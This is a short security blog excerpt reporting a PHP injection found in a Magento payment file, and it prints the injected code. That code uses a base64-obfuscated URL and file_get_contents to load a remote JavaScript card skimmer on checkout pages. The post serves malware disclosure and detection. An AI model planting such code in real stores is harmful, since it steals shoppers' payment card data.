Global CyberSecurity

Magento PHP Injection Loads JavaScript Skimmer


Published on 01/21/2021 – Last Updated on 01/21/2021 by OTC

A Magento website owner was concerned about malware and reached out to our team for assistance. Upon investigation, we found the website contained a PHP injection in one of the Magento files: ./app/code/core/Mage/Payment/Model/Method/Cc.php

if (strpos($_SERVER[“REQUEST_URI”], “/onestepcheckout/index/”) !== false){
echo file_get_contents(base64_decode(“aHR0cHM6Ly91bmRlcnNjb3JlZndbLl1jb20vc3JjL2tyZWEuanM=”));

To make it more difficult to detect, the JavaScript skimmer is loaded using the PHP function file_get_contents and the URL obfuscated with base64.

Continue reading Magento PHP Injection Loads JavaScript Skimmer at Sucuri Blog.

Pakistan sends replenishment oiler to Africa for humanitarian aid

Previous article

Bringing a knife to a gunfight โ€“ are European Navies underarmed for peer to peer conflict and power projection?

Next article

You may also like


Comments are closed.